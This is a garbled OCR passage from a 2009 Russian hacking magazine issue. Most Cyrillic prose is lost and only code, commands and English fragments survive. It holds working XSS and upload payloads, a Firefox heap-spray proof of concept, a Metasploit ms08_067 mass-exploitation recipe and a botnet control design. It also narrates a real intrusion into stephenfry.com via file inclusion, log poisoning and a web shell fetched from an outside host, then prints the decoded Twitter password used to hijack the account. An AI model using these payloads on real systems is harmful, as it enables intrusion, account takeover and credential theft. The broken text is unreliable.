, SSH1. OpenSSH :
vi /etc/ssh/sshd_config
[...]
Protocol 2
PasswordAuthentication no
UsePAM no
[...]
, . , Sshguard
(sshguard.sourceforge.net).
(syslog, syslog-ng, metalog, multilog, raw)

. IP- (pf, ipfw, netfilter/iptables hosts.
allow). sshd, dovecot, proftpd, pure-ftpd,
FreeBSD ftpd, UWimap (imap, pop). Fail2ban
(www.fail2ban.org) Sshdfilter (http://www.csc.liv.ac.uk/~greg/
sshdfilter).z
X 08 /128/ 09
>>
Easy Hack
R0ID
/ R0ID@MAIL.RU /
SKVOZ
:
( , ) , . ,
. , KardaTools,
, .
, , ,
.
Windows,
. ,
. , ,
.
1. HKEY_LOCAL_MACHINE\SOFTWARE\
MICROSOFT\WINDOWSNT\CURRENTVERSION\FONTSUBSTITUTES\,
:
"MS Shell Dlg" = "MS Sans Serif,204"
"MS Shell Dlg 2" = "MS Sans Serif,204"
2. HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\
WINDOWSNT\CURRENTVERSION\FONTMAPPER\ :
"ARIAL" = dword:000000cc
"DEFAULT" = dword:000000cc
3. HKEY_LOCAL_MACHINE\SYSTEM\
CURRENTCONTROLSET\CONTROL\NLS\CODEPAGE\ :
"1251" = "c_1251.nls"
"1252" = "c_1251.nls"
"866" = "c_866.nls"
"ACP" = "1251"
"OEMCP" = "866"
:
FLASH
:
Flash
. ,
,
USB-. : ? -,
Flash, Calculate
Linux Desktop (www.calculate-linux.ru). Gentoo Linux
036

"MACCP" = "10007"
"OEMHAL" = "vga866.fon"
, , . WinXP .
1. .reg :
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\
CodePage]
"1252"="c_1251.nls"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\FontSubstitutes]
"Arial,0"="Arial,204"
"Comic Sans MS,0"="Comic Sans MS,204"
"Courier,0"="Courier New,204"
"Microsoft Sans Serif,0"="Microsoft Sans Serif,204"
"Tahoma,0"="Tahoma,204"
"Times New Roman,0"="Times New Roman,204"
"Verdana,0"="Verdana,204"
2.
.
3. .
, LiveCD,
USB-Flash . :
Calculate Directory Server ( Calculate Linux)

Gentoo Linux
LiveCD
: , , ,
, , , ,
X 08 /128/ 09
>>
HDD, USB-Flash USB-HDD

: ext4, ext3, ext2, reiserfs, xfs jfs
:
1. CD/DVD-, Calculate
Linux Desktop ( www.calculate-linux.ru).
2. / fdisk:
fdisk <drive>
<drive> .
3. , ext4,
ext3, ext2, reiserfs, xfs jfs.
4. :
:
/, -
disk=/dev/sda2 ( sda2 sda3)

set-march=i686 (x86_64) 32
64-
set-format=reiserfs (ext3, ext2, jfs, xfs)
set-video_resolution=1280x1024 (1024x768, 1152x864,

1280x800 ..)
set-hostname=linux
set-mbr=off MBR
set-composite = on|off
, Linux-OS.
,
.
:

, , , .
. ,
- ,
.
, , . DriveCrypt, . , :
1. .
2. .
3. ,
X 08 /128/ 09
037
>>
.
, .
4. , .
5. Drivers, (, C:\) . .
6. , . :
DOS ( )
Vesta ( )
HDD Black Screen ( ;

)
7. , ,
.
, , ,
.
,
. , , :).
20
Whois
78.108.96.47:8080
2009-07-20
189.56.61.33:3128
:).
-,
n- .
Find proxies for Me. . :
,

IP
( IP:
aaa,bbb,ccc,ddd<=255, : eeeee<=65536)
20
Czech Republic
anonymous
Brazil
2009-07-
anonymous
China
2009-07-
Whois
222.218.156.66:80
20
anonymous
Whois
Whois
2. .
3. ,
( Text).
4. ( IP/ ) , .
:
1. , , -.
:
61.172.249.96:80 anonymous
China
2009-07-20
Whois
75.151.214.249:8080
2009-07-20
72.55.136.167:3128
20
anonymous
Canada
2009-07-
anonymous
Brazil
2009-07-
anonymous
Brazil
2009-07-
anonymous
Iraq
2009-07-
Whois
189.127.163.1:3128
20
United States
Whois
189.108.93.244:3128
20
anonymous
Whois
Whois
213.185.116.218
3128
:
,
ACL-.
?
MACA ,

:
, MAC
,
. , , MAC,
IP! ,
. Sterm, Cain&Abel.
:
1. , Configure.
038
2. (
).
3. IP Spoofed Source Address.
:
# .htaccess-
Options +FollowSymLinks
RewriteEngine on
#
# IP
RewriteCond %{REMOTE_ADDR} !^1\.2\.3\.4$
# IP
RewriteCond %{REMOTE_ADDR} !^5\.6\.7\.8$
RewriteRule .* http://www.google.com/ [R=302,L]
IP, (,
X 08 /128/ 09
>>
- ), Google. :
# allow/deny .htaccess-
<limit GET>
satisfy any
order deny,allow
deny from all
allow from 63.76.22.2
allow from 130.116.16.
: MD5,

:

require valid-user
</limit>
,
,
. , Winpcap LibInject.
if ($connect->content =~ /Cleartext of $hash is (.*)/)

{
print "Result : $1\n";
} else {
print "Result : Hash not found!\n";
}
! . ,
. , Hashcracking.info. , ,
, ,
.
HashSearcher. mailbrush. 15 MD5-. :
hashcracking.info, md5.rednoize.com, tmto.org, md5pass.info, milw0rm.
com. , ! ,
.
Perl:
$url = "http://md5.hashcracking.com/search.php?md5=$hash;
$lwp = LWP::UserAgent->new();
$lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en;
rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp -> get($url);
print md5.hashcracking.com
---- ;
: RAINBOW TABLE,
GPU
:
, ,

, , , winrtgen,
. GPU
, Zhu Shuanglei.
(rtgen CUDA)
project-rainbowcrack.com. XSerg. :
# ,
, ,

RainbowTableGenerate.exe md5 alpha 1 8 0 2400 40000000 xek 240
:
Md5 ;
X 08 /128/ 09
alpha ;
1 8 ;
0 ;
2400 40000000 ;
xek ;
240 . GeForce
GTX 280. 240 .
. z
CUDA

039
>>
(ICQ 884888)
/ HTTP://WAP-CHAT.RU /
OBZOR KSPLOITOV
- .
, , .
, WordPress, MediaWiki, Mozilla Firefox, MS
Internet Explorer MS Office,
web cms, WYSIWYG- FCKeditor.
01

WORDPRESS
>> Brief
WordPress
, . Core Security Technologies (http://
www.coresecurity.com/corelabs) ,

( )
.
XSS- , .
./
wp-admin/options-general.php?page=[plugin_page],
.
./wp-admin/admin.php, . :
// ,
./wp-content/plugins
if (isset($_GET['page']))
{
$plugin_page = stripslashes($_GET['page']);
$plugin_page = plugin_basename($plugin_page);
}
...
// Handle plugin admin pages.
if (isset($plugin_page))
{
if ( validate_file($plugin_page) )
{
040
wp_die(__('Invalid plugin page'));

}
if (! ( file_exists(WP_PLUGIN_DIR . "/$plugin_
page") && is_file(WP_PLUGIN_DIR . "/$plugin_page") ) )
wp_die(sprintf(__('Cannot load %s.'),
htmlentities($plugin_page)));
do_action('load-' . $plugin_page);
//,
include(WP_PLUGIN_DIR . "/$plugin_page");
}
...
,
.
.
>> Targets
WordPress 2.8 .
WordPress MU 2.7.1 .
>> Exploit
:
1. Collapsing Archives:
http://[some_wordpress_blog]/wp-admin/admin.php?page=/
collapsing-archives/options.txt
2. - Akismet, :
http://[some_wordpress_blog]/wp-admin/admin.
php?page=akismet/readme.txt
3. XSS Related Ways To Take Action:

X 08 /128/ 09
php?page=related-ways-to-take-action/options.php
Exclude actions by term :

\"/><script>alert(String.fromCharCode(88)+String.
fromCharCode(83)+String.fromCharCode(83))</
script><ahref="
>>
SendUploadResults( '1', '', '',

'The ""' . $sCommand .'"" command isn\'t allowed' );
// Check if it is an allowed type.
if ( !IsAllowedType( $sType ) )
SendUploadResults( 1, '', '',
'Invalid type specified' );
FileUpload( $sType, $sCurrentFolder, $sCommand )
?>
4. Dashboard- WP Security Scanner:

php?page=wp-security-scan/securityscan.php
5. Intrusion Detection System:

http://[some_wordpress_blog]/wp-admin/index.
php?page=wp-ids/ids-admin.php
advisory http://milw0rm.com/
exploits/9110.
>> SOLUTION

, wordpress.com (
2.8.1).
02

FCKEDITOR
>> Brief
FCKeditor, TinyMCE, WYSIWYG- WEB-x, Zope, PHPList, Falt4 CMS, RunCMS, Dokeos, Nuke ET.
,
, CurrentFolder (, www.securitylab.ru/vulnerability/382191.php www.securityfocus.
com/bid/31812). ,
HTML based
.
, (http://dfn.dl.sourceforge.net/
sourceforge/fckeditor/FCKeditor_2.6.4.zip) , upload ./
editor/filemanager/connectors/php/upload.php:
<?php
...
$sCurrentFolder = GetCurrentFolder() ;

GetCurrentFolder(), ./editor/
filemanager/connectors/php/io.php:
function GetCurrentFolder()
{
if (!isset($_GET)) {
global $_GET;
}
$sCurrentFolder = isset( $_GET['CurrentFolder'] )?
$_GET['CurrentFolder'] : '/' ;
// Check the current folder syntax (must begin and
start with a slash).
if ( !preg_match( '|/$|', $sCurrentFolder ) )
$sCurrentFolder .= '/' ;
if ( strpos( $sCurrentFolder, '/' ) !== 0 )
$sCurrentFolder = '/' . $sCurrentFolder ;
// Ensure the folder path has no double-slashes
while ( strpos ($sCurrentFolder, '//') !== false )
{
$sCurrentFolder = str_replace (
'//','/', $sCurrentFolder) ;
}
// Check for invalid folder paths (..)
if ( strpos( $sCurrentFolder, '..' ) ||
strpos( $sCurrentFolder, "\\" ))
SendError( 102, '' ) ;
return $sCurrentFolder ;
}
, , FileUpload()
./editor/filemanager/connectors/php/commands.php:
function FileUpload(
$resourceType, $currentFolder, $sCommand )
{
...
// Map the virtual path to the local server path.
$sServerDir = ServerMapFolder($resourceType,
$currentFolder, $sCommand ) ;
// Is enabled the upload?

if ( ! IsAllowedCommand( $sCommand ) )
// Get the uploaded file name.

$sFileName = $oFile['name'] ;
$sFileName = SanitizeFileName( $sFileName );
MEDIAWIKI
...
$sFilePath = $sServerDir . $sFileName ;
AKISMET/README.TXT WORDPRESS
X 08 /128/ 09
041
>>
FCKEDITOR
-, Amalthea 13
XSS-.
./includes/specials/SpecialBlockip.php site.com/index.php/Special:Block.
, :
CALC.EXE, FIREFOX
...
move_uploaded_file( $oFile['tmp_name'],
$sFilePath ) ;
...
}
ServerMapFolder() folder path

, $currentFolder.
GetCurrentFolder(),
directory traversal,
null-byte.
<?php
...
class IPBlockForm
{
...
function IPBlockForm( $par )
{
global $wgRequest, $wgUser, $wgBlockAllowsUTEdit;
// wpBlockAddress $_REQUEST
$this->BlockAddress = $wgRequest->getVal(
'wpBlockAddress', $wgRequest->getVal( 'ip', $par ) );
$this->BlockAddress = strtr(
$this->BlockAddress, '_', '' );
...
}
...
>> Exploit

FCKeditor ./editor/filemanager/
connectors/uploadtest.html.
, Select the File Uploader to use PHP (,
), Upload a
new file , .txt , ,
Current Folder - my-evil-shell.php%00.
, ,
Uploaded File URL (
./userfiles/test.php).
, $sFilePath move_uploaded_file()
($sServerDir),
($sFileName) - -.
// html-
function showForm( $err )
{
...
$user = User::newFromName( $this->BlockAddress );
...
//
wpBlockAddress -
Xml::input( 'wpBlockAddress', 45,
$this->BlockAddress, array(
FCKEDITOR
>> Targets:
FCKeditor <=2.6.4, web cms,
WYSIWYG-.
>> Solution
, http://www.
fckeditor.net.
03

MEDIAWIKI
>> Brief
-! MediaWiki,
042
X 08 /128/ 09
>>
CALC.EXE, ACTIVEX IE
TUN KERNEL
DENIAL OF SERVICE MOZILLA FIREFOX
'tabindex' => '1',

'id' => 'mw-bi-target',
'onchange' => 'updateBlockOptions()' ) ). "
</td>
</tr>
<tr>"
);
...
}
...
?>
wpBlockAddress ( $thisBlockAddress) ,
.
>> Exploit
.
- :
04
MOZILLA
FIREFOX
>> Brief:
,
. Firefox
3.5, SBerry aka Simon Berry-Byrne
, .
Just-in-Time (JIT,
JavaScript ): JavaScript
HTML (, font)
, escape().
, , Andrew Haynes
( Denial of Service)
Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer
Overflow Vulnerability. unicode- write JS.
>> Targets
Firefox 3.5 , , .
http://site.com/index.php/Special:Block/?wpBlockAddre
ss="/><script>alert('Privet! Ya MegaXSS :)')</script><a
href="
>> Solution
security- mozilla.
com/firefox.
XSS , .
>> Exploit:

PoC (http://milw0rm.com/exploits/9137),
calc.exe,
html- javascript:
>> Targets
MediaWiki:
MediaWiki <= 1.14.0
MediaWiki <= 1.15.0
>> Solution
,
mediawiki.org/wiki/Download.
X 08 /128/ 09
<html>
<head>
<script language="JavaScript" type=Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
043
>>
XSS RELATED WAYS TO TAKE ACTION

var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
write() , ,
unicode-.
Firefox - (
).
05

MICROSOFT OFFICE WEB
COMPONENTS SPREADSHEET ACTIVEX
>> Brief:
.
IE,
Microsoft Office Web Components Spreadsheet ActiveX. ActiveX
Internet Explorer
Excel. , ,
msDataSourceObject()
(OWC 10 OWC11). (,
iframe)

. , IE,
MS Office,
.
44
044
>> Exploits

http://www.securitylab.ru/vulnerability/382430.php.

ActiveX, , OWC10.Spreadsheet
OWC11.Spreadsheet.
>> Targets:
Microsoft Office XP Service Pack 3;
Microsoft Office 2003 Service Pack 3;
Microsoft Office XP Web Components Service Pack 3;
Microsoft Office Web Components 2003 Service Pack 3;
Microsoft Office 2003 Web Components for the 2007 Microsoft Office system
Service Pack 1;
Microsoft Internet Security and Acceleration Server 2004 Standard Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2006;
Internet Security and Acceleration Server 2006 Supportability Update;
Microsoft Internet Security and Acceleration Server 2006 Service Pack 1;
Microsoft Office Small Business Accounting 2006.
>> Solution:
, Microsoft .
CLSID:
{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}
06

LINUX
>> Brief:
17 *Nix-,
grsecurity Brad Spengler PoC
Linux.
, Linux
.
, net/tun - tun_chr_pool() drivers/net/tun.c:
X 08 /128/ 09
>>
XSS MEDIAWIKI
struct sock *sk = tun->sk;

// initialize sk with tun->sk
...
if (!tun)
return POLLERR;
// if tun is NULL return error
, :
sk ,
. ,
, , .
,
,
if(!tun).
, ,
0x00000000,
.
>> Exploits
,

http://milw0rm.com/exploits/9191.
>> Targets:
Linux kernel <= 2.6.30 ( GCC
-fdelete-null-pointer-checks).
>> Solution:

GIT- : http://git.
kernel.org. z
X 08 /128/ 09
045
>>
START

M0R0 / M0R0@INBOX.RU /
>>
, ,
? , , .
,
. , Metasploit,
.
-
. ?
, , -

.
x-tool'z,
, ..
.
, ,
.
,

. ,
,
.
XP
MS08_067 DB_UTOPWN
,
046
,
, . , 0-day,
. -,
nmap , ,
winpcap, .
EasyHack SKVOZ (z 2009)
. ,
.
,
. ,
, user guide. . ,
,
conficker
. , SKVOZ nmap
MS08_067.
-
.
.
,
.
2009 Microsoft
20 .
ms09-001 SMB.
, , ,
.
. , .
, .

( ,
).

(
WinXP) , ,
, X 08 /128/ 09
>>
C MS08_067
.

. -,
.
cp866, Windows cp1251,
Koi8-r Unicod.
, meterpreter,
.
.
.
(trac.metasploit.com/ticket/253).
, , . , , ,
.
,

,

. : ,
, -
.
AutoIT, SciTe
AutoIT .
, ,

.
,
SID, ,
SID S-1-5-32-544. SID API-
LookupAccountName, AdvAPI32.dll. Security.
au3 - _Security__LookupAccountName.
(
user.au3 DVD).
X 08 /128/ 09
TraySetState 2
AutoIT . , .
,
XP.
exe- .
, .
SMB. ,
,
user.
exe? , .
,

. , ftp.
ftp- ( FileZilla), ,
%temp%
ftp-
.
ftp.exe -s, user.exe .

.
,
. , ,
.
FTP ,
. ,

,
. ,
. , , .
( Radmin, VNC
..) .

, . RDP XP
:

.
, .

Redmond', ,
.

RDP, .
XP ,
( Home Edition, ,
).
,
- -
, , .
- XP ,
termsrv.dll
. ,
. , ,
, , ,
-
047
>>
XP
HTTP://WWW
links

:
metasploit.org.
DVD
dvd
:

final.au3.

termsrv.dll.

.

,
.
048
.
, dll Windows File
Protection. ( CD
), . ,

. ,
, , ,
, .

, , , .
, , , - . , .

. , , ,
metasploit, ,
, , , , , .
, , ,
.
, .
. DVD
final.au3, , .
,
, .
fsp, ,
.
Au3Info
AutoIT. ,
2 .
fsp , .

.
,
RDP. ,
XP, .
XP, sc
, ,
fsp. ,
, .
dll (
TermService, ,
), dll %systemroot%\
system32\DLLCache ( ), , ,
%systemroot%\system32.
.
%temp%,
(, ),
%temp%\final.exe . ? psexec
. RDP.
, .
SMB
SMB
. , , Microsoft, , (
). 14
smb; . ms08_067, , ,
. netapi32.dll,
, wcscat ( , conficker).
RPC- UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188,
srvsvc.
,
. VmWare
, 2008 (
),
. , ,
.
,
ms08_067
!
, Make
SMB Connection error:53 (network path was not found).
, ,
. ,
.
X 08 /128/ 09
>>

DB_AUTOPWN
Fingerprint: Windows XP Service Pack 2+

lang:Russian, SP3.
, ,
.
, sp
+, ,
. ,
(Windows XP SP3 Russian
(NX)) . Exploit
failed: The server responded with error: STATUS_
OBJECT_NAME_NOT_FOUND (Command=162
WordCount=0).
.

Selected Target: Windows XP
SP0/SP1 Universal Exploit failed: The server
responded with error: STATUS_OBJECT_NAME_
NOT_FOUND (Command=162 WordCount=0).
, .
.
BROWSER
SRVSVC, .
, ,

,
.
, !
- .
.
-
.
- ,
. .
-- , !

.
, ,

.

.
,
X 08 /128/ 09
SFX
windows/upexec/
bind_tcp.
.
, ,
, .
,
,
, ,
. windows/download_exec.
Web-,
.
,
, XAMPP. .
URL
.
Exploit failed:
No encoders encoded the buffer successfully.
: download_exec
,
,
stager, , download_exec/bind_tcp.

.
RDP ,
.
,
, .
,
. -,
db_autopwn
,
5. , 5
.
-, db_autopwn

,
sessions l. ,
,
,
download_exec ,
- .
049
>>
WEB- FTP-
XAMPP
INFO
info

Web-
FTP-
,

!
z. XAMPP
(apachefriends.org/
en/xampp.html).

,
PoC.
, ,
,

termsrv.dll ,

, ,
support_388945a0,

.

,
,
.
050
AUTOIT
%appdata%\msf32\
modules\payloads\singles\windows\download_exec.
rb . , , . !
session
Msf::Sessions::CommandShell.
.
, db_autopwn download_exec.
, SKVOZ
-b, ,
bind-.
, .

. ,
,
, . db_autopwn -.
db ( %appdata%\
msf32\lib\msf\ui\console\command_dispatcher\db.rb)
, meterpreter,
generic .
,
X 08 /128/ 09
>>

.
download_exec,
db.rb;
DVD .
- , -
, , -P.
:
-P,
; , .

.
,
.
%appdata%\.msf3\config
.
,
ms08_067
:
- TARGET=0 ( );
X 08 /128/ 09
- PAYLOAD=windows/download_exec/
bind_tcp;
- URL=http://172.16.1.10/st.exe.
172.16.1.10 , Web-, st.exe ,

. , ,
.

, ,
.
,
RDP. .
metasploit
:

load db_sqlite3
db_create
db_nmap -sT -PN -PS445 -p445
172.16.1.0/24
setg URL http://172.16.1.10/st.exe
db_autopwn -e -p -P windows/
download_exec/bind_tcp -m ms08_067
<ENTER> .

.
sessions l,
30 ,
. , mstsc . ! 30- ,
5 .
, ESET NOD32 4, Dr.Web

. ,
Outpost Kaspersky Anti-Hacker.
. NMAP 116
445,
30.
, ,

! , ?
,
SRVSVC.

, !
,

(forum.antichat.ru/thread99665.html),
, .
, ,
. :
- , ,
!. , :).
,
.
,
! , ,
!
! z
051
>>
Payment Card Industry Data Security Standard (PCI DSS)
S4AVRD0W / S4AVRD0W@P0C.RU /
PCI DSS
>>

.
, .
, .
.
OSSTMM
OWASP.
-
, , Cobit, ISO/IEC
2700x, CIS/SANS/NIST/etc
PCI DSS.
, ,
,
. ,
. ,
.

,
052
, / .

,
,
OSSTMM
OWASP. , PCI DSS OWASP
(AsV), (QSA).
PCI DSS

:
1. (
)
.
2. -
(DoS). ,

.
3.
(PAN, Cardholder Name
..). (gray box)

.

,
24/7.

PCI :
X 08 /128/ 09
>>
Payment Card Industry Data Security Standard (PCI DSS)
DTP-
.11.1(b)
.11.2
(AsV)
.11.3.1
(Network-layer
penetration tests)
.11.3.2
(Applicationlayer penetration tests)
,
.

,

. ,
,

.
,
,

( , . Forb) . ,
PCI DSS, ,
:
(, , , ..)
(ACL/)
Web-
( , )

-
,
X 08 /128/ 09
(,
N ),

, ,

.
NETWORK-LAYER
PENETRATION TESTS

(promiscuous
mode).

Wireshark CommView.
, 1-2 .

.

:
(STP, DTP
..)
(RIP,
EIGRP ..)
(DHCP, BOOTP)
(telnet, rlogin
..)
,
, ,
. ,
,
.
:
MITM (Man in the

middle) ,
DHCP, RIP
STP
(Root Bridge),
DTP (enable trunking);

Yersinia.
,
DTP-
( ). DTP
ACCESS/DESIRABLE
. .

OSI.
ARPpoisoning. . ,
, Cain&Abel Ettercap
( ,
, SSL). ,
ARP-poisoning
,
,
, .
,
, /
, -
( , ,
, etc).
ARP-poisoning

,
(
053
>>
WEB-BASED
SAINTEXPLOIT

INFO
info

:).
CORE IMPACT
NTLM), SNMP-community string .

-
,
(rainbow tables), . - ,
.
,
CAV2/CVC2/CVV2/CID/PIN, .
cap- NetResident / 0x4553-Intercepter. ,
,
.
APPLICATION-LAYER
PENETRATION TESTS
HTTP://WWW
links
pcisecuritystandards.
org PCI Security
Standards Council.
pcisecurity.ru ,
PCI DSS .
pcidss.ru ,
PCI DSS Digital
Security.
isecom.org/osstmm
Open Source
Security Testing
Methodology Manual.
owasp.org Open
Web Application
Security Project.
054
OSI. , ,

. ? .
Nmap Fast scan ( -F -T Aggressive|Insane),
( -p), ,
,
.
Nessus
XSpider ( ) .
(, Windows
NT 4.0), PCI .
,
- , .
PCI , -,

(
), -,

.

. . :).
.
,

. , -
. , .
,
.
1.

,
,
( !) -.
,
, . ,
. Core
Impact,
GUI-.
,
.
, , Core Impact, ,
, , ,
. Core Impact

.
: Core Impact, CANVAS, SAINTexploit
Metasploit Framework. , . ,
.
(,
).
Metasploit Framework. ,
zero-day , .
, ,
.

:).
, ,
.
. ,
, SAM (fgdump)
, LSA
(Cain&Abel),
. ,
PCI DSS (. 2.1, .2.1.1, .6.3.5, .6.3.6, .8.4,
.8.5.x).
X 08 /128/ 09
>>
GUI CANVAS METASPLOIT

METASPLOIT FRAMEWORK
2.

,
.
Windows (SMB),
.
,

, , ,
. PCI, ,
.
,
,
.
3.
, ,
-.
, , ( ,
SNMP) . AsV-
PCI DSS
,
DoS.
PCI,

(, WEB, ..).
Web. PCI Web . QSA-.
blackbox- server/client-side .

,
Web. HP WebInspect
Acunetix Web Vulnerability Scanner (,
, AJAX).
,
, w3af,

X 08 /128/ 09
Web-.

Web! , ,
, -,
, SQL,
- . client-side , ,

, .
server-side ,
- , PCI DSS.
, PAN, Cardholder Name CVC2/
CVV2 . ,
,
SQL-
, ;
,
. Blind
SQL-, Web-
sqlmap ( --dump-all),
MySQL, Oracle, PostgreSQL
Microsoft SQL Server.
.
. ,
AppDetective Application Security Inc.,
. ,
,
,
AppDetective,
, .

, ,

. ,
:
Oracle Database Client

Toad for Oracle
PL/SQL
Oracle Assessment Kit SID
PL/SQL
(,

)
PCI
, , ,
,
, Open AP, WEP WPA/
PSK. , PCI
,
.
. , , aircrack-ng.
, ,
Caffe Latte,
.
Wirelessdefence.org.

PCI DSS. , ,

,
.
PCI,
MasterCard AsV-.

,

PCI DSS,
,
,
,

MasterCard.
! z
055
>>
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
Controlling
Server
Bot Infection
NUMBER OF COMMANDS
Concurrent
Attacks
- Infection Activities
- DoS Attacks
- Spam Mails
- Spyware
- Upgrades its
functionalities, etc
Malicious
User
Internet
User
Targeting Site
for Attacks
PREDIDENTUA / HTTP://TUTAMC.COM, SPIRT40@GMAIL.COM /
>>
,
, --
.
- ( !). ,
, .
.

. , ,
:).
, 2
. ,
, , , .
056
,
...
1000 10.000 ,
, , .
,
100.000.

,
,
.
X 08 /128/ 09
>>
Targeting Site
for Attacks

P2P
:)
, . , ,
, ,
,
.
, , .
, ,
, , . ,

.
,
: ,
, .
.

, ,
.
, (
!
,
.
:
, :).
:

. .
:
?
? :).
X 08 /128/ 09
, , .) . :
.
, .

.
IRC,
,
- . ,
,
.
p2p web.
p2p ,
.
,
.
:

...
web'
. , Zeus.
,
(
).
, ,
,
,
,
.
.

,
. ,
.
, (). ,
.
:
1234, : 6452, 12, 761 ..
, .
, ,
, -
,
.
.
:

, -

,

,
, ,
,
. . :
.com
.org
.ho.ua
057
>>
Controlling
Server

Bot Infection
HTTP://WWW
links

RSA-:
ru.wikipedia.org/wiki/
RSA.

Malicious
: ru.wikipedia.
User
org/wiki/__.
:
ru.wikipedia.org/wiki/
.
IRC-

INFO
info
RSA (
Rivest, Shamir
Adleman)
.
RSA ,

,
.

,

.ho.ua .
,
, .
. , , , , temp123.
txt, .
, , ,
.
( , ).
; , temp123.
txt . -
( , ..), . ,
.
,
, .
(, .
Pseudorandom number generator, PRNG) ,
,

( ).

-
.
.
. ORNL (.):
,
.
. ,
. :
,
, .
.
. .
:
,
,
, . .
:
WARNING
warning

.
058
: 3001-3004
:
3001 3004 . 4 ,
.
,
. 4 ( )
RSA-
X 08 /128/ 09
>>
Controlling
Server

Bot Infection
, ,

RSA-
, ,
).
, , :
___: " "
RSA
: 3001
,
,
,
.

,
-
- .
.
, ,
, , , , , . ,
AES-,
BASE64. , ,

, .
, .
,
Perl', , ,
.
RSA. RSA
, ,
, .
. :
, . - .
:
1. _
2. tutamc.com
X 08 /128/ 09

3. 00:01 08.07.2009
4. 23:59 09.07.2009
5. 1
6. ...
7. ___
, .
,

( ).
(, ) ,
, . ,
, ,
,
. ,

, ,
.
.
RSA 2048 .
. ,
,
- , AES.

.
, , .

(

,
. .
, ,
, ,
, .
RSA.
.
, .

POST-.
,
( , tttt123.php).

, ( tttt123.php
). ,
, , .
, . ,
. ,
.
Python'e,
. ,
,

.
FROM MY
, ( )
, , (
) , . ,
. z
059
>>
/ ICQ 884888, HTTP://WAP-CHAT.RU /
TWITTER-
,
- , . ,

( ).
. ,
V ,
.
,
http://www.
stephenfry.com ,

-, .
stephenfry.com/clubfry/twitter.
API , ,
-
:). ,
twitter (twitter.com/stephenfry),
644,489(!) .

.
WordPress
phpBB.
(stephenfry.
com/blog), :
060
<meta name="generator"
content="WordPress 2.5.1" />
, 2.5.1
,
.

phpBB. ,
stephenfry.
com/forum/docs/CHANGELOG.html.
change Changes since 2.0.20,
,
- (, ,
XSS CSRF ).
XSS phpBB,

:
site:stephenfry.com filetype:php
PHP-, . stephenfry.com/section.php?
section=clubfry&subsection=twitter.
:
, .
,
:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/etc/passwd%00
/etc/passwd :).
-
! ,
.

z,

X 08 /128/ 09
>>
STEPHENFRY.COM
, /proc/self/*.

/proc/self/environ:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/proc/self/environ%00
, /proc/self/environ
:(.
.
, error_log /proc/self/fd/2 ( , access_log
-
, LFI).
error_log
referer,

PHP-. , .

:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /

evil-,
Host. , , :
STEPHENFRY.COM
z:/usr/local/bin/curl.exe "http://
www.stephenfry.com/" -H "Host:"
--referer "<?php eval($_GET[cmd]);
?>"
,
error_log:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /,
referer: <?php eval($_GET[cmd]); ?>
X 08 /128/ 09
061
>>
HOST
HTTP://WWW
links
www.stephenfry.
com
.
ru.wikipedia.org/
wiki/_

.
twitter.com/
stephenfry
.
INFO
info

(Stephen John
Fry)
,
,
(
,

).

(1997).

, , ,

.
062

:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=phpinfo();
find
./ -type d -perm 0777 -ls , , .
/home/fry/public_html/img/blog_thumbs/
C99madShell blog.php wget:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=system('wget -O /home/fry/public_
html/img/blog_thumbs/blog.php http://madnet.
name/files/download/9_c99madshell.php');

. /home/fry/public_html/index.php:
<?php
include_once("lib/sf_main.php");
$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
include(SF_BASE_DIR."/templates/
navigation/header.php");
...
?>
lib/sf_main.php:
<?php
include_once
include_once
include_once
include_once
...
?>
"sf_constants.php";
"sf_db_class.php";
"sf_template.php";
"sf_cache_functions.php";
, , lib/sf_constants.php:
<?php
...
// Twitter
define('SF_TWITTER_USER','stephenfry');
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMz
X 08 /128/ 09
>>
d3bzQ=');
...
?>
, SF_TWITTER_PASSWORD
base64,
base64_decode w41la8yon37wo4.
! (
).
twitter.com
.
-, twitter.com,
stephenfry w41la8yon37wo4 :).
What are you doing?, Ill
be watching you! From Russia with love :) (
).
:
RegNomSongs by The Police and Matt Monroe. This is a
quiz, right? RT @stephenfry: Ill be watching you! From
Russia with love :)
---
lokimaros@stephenfry How about how

radically changed your life and listening
habits.
--NikkiG57@stephenfry tell them about Russia, Wagner and
your performance at Glastonbury
--valpanna@stephenfry I am afraid, very afraid!
--Benn2100@stephenfry Ill be watching you too
--thisheartbeatz@stephenfry have fun in RUSSIA! B)
--wrathofagony@stephenfry cool in Russia? how is it???
--CybrHwk@stephenfry Your in Russia? Where about in Russia
are you Stephen?
--chriscattaneoRT @stephenfry: Ill be watching you! From
Russia with love :) ok James!
